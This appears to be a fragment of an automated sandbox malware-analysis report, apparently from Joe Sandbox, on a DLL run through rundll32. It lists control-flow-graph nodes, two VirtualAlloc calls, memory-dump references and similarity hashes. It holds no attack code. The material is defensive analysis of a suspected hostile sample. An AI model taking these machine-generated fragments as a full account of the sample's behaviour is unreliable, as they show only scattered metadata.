                                                                                                                                  control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 250 10001a83-10001a9e call 10001990 247->250 251 10001a1d-10001a2a 247->251 249 10001b0b-10001b0e 248->249 260 10001aa0-10001aa2 250->260 261 10001aa4-10001ac9 VirtualAlloc 250->261 253 10001a2c-10001a4e VirtualAlloc 251->253 254 10001a7e 251->254 255 10001a50-10001a52 253->255 256 10001a57-10001a7b call 100017c0 253->256 254->246 255->249 256->254 260->249 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->249 264->248
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                  • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                  • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                  • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                  • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%